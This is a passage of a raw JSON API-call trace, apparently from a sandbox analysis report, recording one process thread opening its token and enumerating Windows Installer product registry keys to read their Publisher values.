"\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 145 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 146 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties" } ], "repeated": 0, "id": 147 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "5" }, { "name": "Name", "value": "C49115752914EB648805A289B86E3BAB" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\C49115752914EB648805A289B86E3BAB" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xb6Pv" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "6" }, { "name": "Name", "value": "D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\x7f\\x00\\x01\\x00" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\xec\\xea\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x94\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xf4\\xe7\\x19\\x00\\x00\\x00\\x00\\x00\\xfb\\xe7\\x19\\x00\"\r\\x08s\\x18\\xe8\\x19\\x00\\x0c\\xe8\\x19\\x00H\\x00\\x00\\x00<\\xe8\\x19\\x00\\x04\\xeb\\x19\\x00" } ], "repeated": 0, "id": 195 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties" } ], "repeated": 0, "id": 197 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": 